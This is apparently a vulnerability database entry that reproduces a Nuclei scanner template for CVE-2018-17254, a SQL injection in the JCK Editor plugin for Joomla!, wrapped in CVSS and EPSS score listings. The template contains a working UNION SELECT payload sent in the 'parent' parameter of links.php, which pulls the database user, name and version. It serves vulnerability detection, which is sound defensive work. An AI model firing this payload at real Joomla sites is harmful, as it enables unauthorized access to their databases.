Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-17254
HistoryJun 18, 2021 - 10:24 a.m.

Joomla! JCK Editor SQL Injection

2021-06-1810:24:58
ProjectDiscovery
github.com
5

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.9 High

AI Score

Confidence

High

0.796 High

EPSS

Percentile

98.3%

The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.

id: CVE-2018-17254

info:
  name: Joomla! JCK Editor SQL Injection
  author: Suman_Kar
  severity: critical
  description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
  remediation: Update or remove the affected plugin.
  reference:
    - http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html
    - https://www.exploit-db.com/exploits/45423/
    - https://github.com/Nickguitar/Joomla-JCK-Editor-6.4.4-SQL-Injection
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-17254
    cwe-id: CWE-89
    epss-score: 0.81623
    epss-percentile: 0.9836
    cpe: cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\!:*:*
  metadata:
    max-request: 1
    vendor: arkextensions
    product: jck_editor
    framework: joomla\!
  tags: cve,cve2018,packetstorm,edb,joomla,sqli,arkextensions,joomla\!
variables:
  num: "999999999"

http:
  - raw:
      - |
        GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5({{num}})),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}

    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'
# digest: 4a0a00473045022100fc614c7ce6111ad91c84bd0aa0ea41a890f1011589191cb9bf421297dcb368c0022014a093e4b3f0c08bb8ae522059822568b1460a62461658ab6f3f0239ec6a8e69:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.9 High

AI Score

Confidence

High

0.796 High

EPSS

Percentile

98.3%